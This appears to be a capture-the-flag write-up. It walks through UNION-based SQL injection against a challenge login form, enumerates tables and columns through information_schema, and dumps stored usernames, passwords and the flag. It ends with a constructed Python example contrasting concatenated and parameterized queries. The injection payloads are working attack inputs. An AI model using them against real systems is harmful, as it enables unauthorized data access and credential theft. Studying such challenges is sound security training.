123'
Submitting this shows that both input fields have SQL injection problems:
You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''123''' at line 1
123'; database() #
Returns:
You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near 'database() #'' at line 1
This shows that stacked injection cannot be used this way.
123' union select 1 #
Returns:
The used SELECT statements have a different number of columns
123' union select 1,2,3 #
Returns:
Login Success!
Hello 2!
Your password is '3'
This shows that the page displays the second and third columns of the query.
123' union select 1,database(),3 #
Returns:
Hello geek!
Your password is '3'
We now know the database is named geek.
# This does not work: with 3 placed at the end, it throws a syntax error
123' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database(),3 #
# This works: put the group_concat column and its FROM clause last
123' union select 1,2, group_concat(table_name) from information_schema.tables where table_schema=database() #
Returns:
Hello 2!
Your password is 'geekuser,l0ve1ysq1'
Next, dump the columns of the l0ve1ysq1 table:
123' union select 1,2, group_concat(column_name) from information_schema.columns where table_name='l0ve1ysq1'#
Returns:
Hello 2!
Your password is 'id,username,password'
123' union select id,username,password from l0ve1ysq1 limit 1 #
123' union select id,username,password from l0ve1ysq1 limit 2,1 #
Returns:
Hello cl4y!
Your password is 'wo_tai_nan_le'
So this approach works.
# This also works, but it is a bit slow
123' union select id,username,password from l0ve1ysq1 limit 2,1 #
# This is better and faster
123' union select 1,2,group_concat(id,username,password) from l0ve1ysq1#
Returns:
Hello 2!
Your password is '1cl4ywo_tai_nan_le,2glzjinglzjin_wants_a_girlfriend,3Z4cHAr7zCrbiao_ge_dddd_hm,40xC4m3llinux_chuang_shi_ren,5Ayraina_rua_rain,6Akkoyan_shi_fu_de_mao_bo_he,7fouc5cl4y,8fouc5di_2_kuai_fu_ji,9fouc5di_3_kuai_fu_ji,10fouc5di_4_kuai_fu_ji,11fouc5di_5_kuai_fu_ji,12fouc5di_6_kuai_fu_ji,13fouc5di_7_kuai_fu_ji,14fouc5di_8_kuai_fu_ji,15leixiaoSyc_san_da_hacker,16flagflag{172a03e1-ad34-4139-8e61-8cb1c747e4a8}'
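
Why the login form behaves as shown above, and the fix, as an added example that is not the challenge's own code: a concatenated query next to a parameterized one. Assumptions: the query shape, the function names and the sample row are constructed, and SQLite stands in for MariaDB, so the payloads end in "--" instead of "#".

```python
import sqlite3

def make_db():
    # Constructed stand-in for the challenge table; SQLite replaces MariaDB here.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE l0ve1ysq1 (id INTEGER, username TEXT, password TEXT)")
    db.execute("INSERT INTO l0ve1ysq1 VALUES (1, 'alice', 'constructed-secret')")
    return db

def render(row):
    # Mirrors the page's behaviour: columns 2 and 3 of the first row are displayed.
    if row is None:
        return "Login failed"
    return f"Hello {row[1]}! Your password is '{row[2]}'"

def login_vulnerable(db, username, password):
    # Assumed flaw: input is concatenated into the SQL text, so a quote ends the literal.
    sql = ("SELECT id, username, password FROM l0ve1ysq1 "
           f"WHERE username='{username}' AND password='{password}'")
    try:
        return render(db.execute(sql).fetchone())
    except sqlite3.Error as exc:
        return f"SQL error: {exc}"  # raw database errors reach the client

def login_parameterized(db, username, password):
    # Hardened: placeholders bind input as data, so it is never parsed as SQL.
    sql = "SELECT id, username, password FROM l0ve1ysq1 WHERE username=? AND password=?"
    try:
        return render(db.execute(sql, (username, password)).fetchone())
    except sqlite3.Error:
        return "Login failed"  # generic message, no SQL detail

if __name__ == "__main__":
    db = make_db()
    # Payloads from the write-up, with SQLite's "--" comment in place of MariaDB's "#".
    for user in ("123' union select 1 --", "123' union select 1,2,3 --", "alice"):
        pw = "constructed-secret" if user == "alice" else "x"
        print(repr(user))
        print("  concatenated :", login_vulnerable(db, user, pw))
        print("  parameterized:", login_parameterized(db, user, pw))
```

With bound parameters every payload is compared as a literal username and simply fails to match; returning a generic message also removes the column-count error that the write-up relied on.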